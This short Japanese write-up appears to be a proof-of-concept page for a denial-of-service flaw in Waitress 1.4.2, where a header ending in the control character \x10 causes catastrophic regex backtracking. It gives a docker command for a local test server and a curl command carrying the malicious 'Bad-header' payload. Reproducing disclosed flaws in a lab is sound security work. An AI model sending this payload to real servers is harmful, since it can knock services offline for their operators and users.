Waitress バージョン 1.4.2 は、Waitress が不正な文字を含むヘッダーを受信したとき、DOS 攻撃を許容します。"Bad-header: xxxxxxxxxxxxxxx\x10" のようなヘッダーを受信すると、正規表現エンジンが破滅的なバックトラッキングを引き起こし、プロセスが CPU 時間を 100% 使用して他の操作をすべてブロックします。これにより、攻撃者は不正なヘッダーを含む単一のリクエストを送信し、サービスをオフラインにすることができます。
NVD による
$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py
$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"
サーバーのCPU使用率を表示します。 docker stats waitress を実行します。

↓ PoC を実行
